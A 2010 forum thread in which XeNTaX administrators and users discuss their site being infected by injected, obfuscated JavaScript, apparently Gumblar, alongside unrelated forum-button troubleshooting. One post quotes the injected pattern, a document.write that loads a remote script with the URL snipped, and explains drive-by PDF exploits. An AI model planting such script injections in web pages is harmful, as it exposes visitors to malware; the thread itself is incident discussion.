XeNTaX attacked by virus

Read rules and news about the XeNTaX Game Discussion Forum
User avatar
Mr.Mouse
Site Admin
Posts: 4051
Joined: Wed Jan 15, 2003 6:45 pm
Location: Dungeons of Doom
Has thanked: 421 times
Been thanked: 575 times
Contact:

Re: XeNTaX attacked by virus

Post by Mr.Mouse » Sun Aug 29, 2010 5:12 pm

Yes. We will try to get everything back in. For now, new registrations have been disabled.

User avatar
Dinoguy1000
Site Admin
Posts: 759
Joined: Mon Sep 13, 2004 1:55 am
Has thanked: 129 times
Been thanked: 142 times

Re: XeNTaX attacked by virus

Post by Dinoguy1000 » Mon Aug 30, 2010 2:55 am

XpoZed wrote:I don't think there was a virus that is downloaded on your PC. It's more likely a session/cookie stealer or something.
Anyway, if someone can provide me with a sample (exe,dll,ocx,sys, etc.) i'll be happy to reverse engineer it (that's my main hobby these days ;)).
It was almost certainly Gumblar, based on de-obfuscating the obfuscated javascript which was inserted on numerous pages. Maybe not a virus, true, but still some type of malware.

It's worth noting that people with properly-upgraded Windows systems and Acrobat/Flash installations may not have had anything to worry about, but you should still run a virus scan just in case (this is one of the basic maintenance tasks you should be regularly running anyways).

One last note, we don't load any scripts, images, or other resources from external URLs (to the best of my knowledge; there may be a couple of images on the wiki loaded from Wikimedia Commons), so you should be able to safely block any such resources from loading.
Welcome to Xentax!

Rules | Requests | Wiki | Discord

If you run across a post that breaks the rules, please report the post - a mod or admin will handle it from there.

User avatar
Mr.Mouse
Site Admin
Posts: 4051
Joined: Wed Jan 15, 2003 6:45 pm
Location: Dungeons of Doom
Has thanked: 421 times
Been thanked: 575 times
Contact:

Re: XeNTaX attacked by virus

Post by Mr.Mouse » Mon Aug 30, 2010 6:38 am

chrrox wrote:im using firefox its only the mark forum read that does not work for me i can go into any thread and the mark read works.
Hmm. http://www.phpbb-seo.com/en/phpbb-forum ... e3678.html This seems to be a phpbb issue

DMorrone
Moderator
Posts: 4
Joined: Sat Aug 28, 2010 5:01 pm
Been thanked: 3 times

Re: XeNTaX attacked by virus

Post by DMorrone » Mon Aug 30, 2010 4:45 pm

Mr.Mouse wrote:
chrrox wrote:im using firefox its only the mark forum read that does not work for me i can go into any thread and the mark read works.
Hmm. http://www.phpbb-seo.com/en/phpbb-forum ... e3678.html This seems to be a phpbb issue
Looking at it again, it's an issue back in 2008, so I'm not sure how relevant it is now. Working in Chrome, the button functions as desired. We're still looking into it.

User avatar
Captain
Site Admin
Posts: 249
Joined: Wed Jan 15, 2003 6:25 pm
Location: Home
Has thanked: 2 times
Been thanked: 61 times
Contact:

Re: XeNTaX attacked by virus

Post by Captain » Mon Aug 30, 2010 6:00 pm

DMorrone wrote:Working in Chrome, the button functions as desired. We're still looking into it.
The button works in the subsections, like here, but doesn't work on the main forum index. I'm pretty sure it's not a browser issue. Tried it myself on Chrome, same result as in Firefox.

DMorrone
Moderator
Posts: 4
Joined: Sat Aug 28, 2010 5:01 pm
Been thanked: 3 times

Re: XeNTaX attacked by virus

Post by DMorrone » Mon Aug 30, 2010 7:16 pm

Craptain wrote:
DMorrone wrote:Working in Chrome, the button functions as desired. We're still looking into it.
The button works in the subsections, like here, but doesn't work on the main forum index. I'm pretty sure it's not a browser issue. Tried it myself on Chrome, same result as in Firefox.
Looks like there is a very recent debate as to how this button should ultimately function:

http://www.phpbb.com/community/viewtopi ... &t=2101636

Polefish
veteran
Posts: 94
Joined: Sat Jun 20, 2009 1:47 pm
Has thanked: 16 times
Been thanked: 13 times

Re: XeNTaX attacked by virus

Post by Polefish » Tue Aug 31, 2010 6:24 pm

Damn I was fucked hard by this virus. Wasn't able to work for 2 days cause of this shit.

User avatar
XpoZed
veteran
Posts: 144
Joined: Sat Oct 24, 2009 5:08 pm
Location: Bulgaria
Has thanked: 2 times
Been thanked: 45 times
Contact:

Re: XeNTaX attacked by virus

Post by XpoZed » Tue Aug 31, 2010 6:29 pm

Can anyone send me the virus ? The infected PDF or something will be fine too.

User avatar
Mr.Mouse
Site Admin
Posts: 4051
Joined: Wed Jan 15, 2003 6:45 pm
Location: Dungeons of Doom
Has thanked: 421 times
Been thanked: 575 times
Contact:

Re: XeNTaX attacked by virus

Post by Mr.Mouse » Tue Aug 31, 2010 6:39 pm

XpoZed wrote:Can anyone send me the virus ? The infected PDF or something will be fine too.
Turns out our computers were clean, or at least a multitude of scanners found nothing.

But whatever it was and where it came from, it injected the sites pages with this :
You do not have the required permissions to view the files attached to this post.

Rheini
Moderator
Posts: 653
Joined: Wed Oct 18, 2006 9:48 pm
Location: Germany
Has thanked: 19 times
Been thanked: 40 times
Contact:

Re: XeNTaX attacked by virus

Post by Rheini » Tue Aug 31, 2010 6:55 pm

I didn't notice anything? What happens if you visit a site that's infected with it?
And what about the pdf etc. stuff? xentax doesn't use anything like flash, pdf...

User avatar
XpoZed
veteran
Posts: 144
Joined: Sat Oct 24, 2009 5:08 pm
Location: Bulgaria
Has thanked: 2 times
Been thanked: 45 times
Contact:

Re: XeNTaX attacked by virus

Post by XpoZed » Tue Aug 31, 2010 7:13 pm

Mr.Mouse wrote: Turns out our computers were clean, or at least a multitude of scanners found nothing.

But whatever it was and where it came from, it injected the sites pages with this :
Thanks, but i've already got this... it just do a document.write('<script type="text/javascript" src="URL SNIP"> </script>')
Then from URL SNIP we had similar script that do a document.write with script again, this time to something like URL SNIP, and there was only a redirect to google.com :?
That's why i've said that this is probably only a logger.

Anyway, if someone got the virus, i'll be happy to play with his bits'n bytes. ;)

@Rheini i've seen similar javascript exploits like this one, that redirect the user to a PDF document with exploit in it. And if you already have installed acrobat reader, that is exploitable (old version etc), you get infected.
Last edited by Dinoguy1000 on Wed Sep 01, 2010 12:56 am, edited 2 times in total.
Reason: URL snip - no need to encourage visitors to visit a malicious site

Rheini
Moderator
Posts: 653
Joined: Wed Oct 18, 2006 9:48 pm
Location: Germany
Has thanked: 19 times
Been thanked: 40 times
Contact:

Re: XeNTaX attacked by virus

Post by Rheini » Tue Aug 31, 2010 7:29 pm

Thank god i don't have that damn Acrobat Reader installed at all (Foxit <3)
I do have Flash though (with Opera)

User avatar
Mr.Mouse
Site Admin
Posts: 4051
Joined: Wed Jan 15, 2003 6:45 pm
Location: Dungeons of Doom
Has thanked: 421 times
Been thanked: 575 times
Contact:

Re: XeNTaX attacked by virus

Post by Mr.Mouse » Wed Sep 01, 2010 9:57 pm

Registrations are back on.

User avatar
Dinoguy1000
Site Admin
Posts: 759
Joined: Mon Sep 13, 2004 1:55 am
Has thanked: 129 times
Been thanked: 142 times

Re: XeNTaX attacked by virus

Post by Dinoguy1000 » Wed Sep 01, 2010 10:30 pm

Awesome! :mrgreen: *registers 839583 dummy accounts* :]
Welcome to Xentax!

Rules | Requests | Wiki | Discord

If you run across a post that breaks the rules, please report the post - a mod or admin will handle it from there.

User avatar
Zerox
mega-veteran
mega-veteran
Posts: 186
Joined: Mon Aug 09, 2010 3:50 am
Has thanked: 4 times
Been thanked: 7 times

Re: XeNTaX attacked by virus

Post by Zerox » Fri Sep 10, 2010 9:41 pm

While attempting to go to the page to download Noesis I got this while using firefox:

Image

This is the link I followed: http://oasis.xentax.com/index.php?content=downloads

Edit: I see it was already reported in his Noesis thread. My apologies.

Post Reply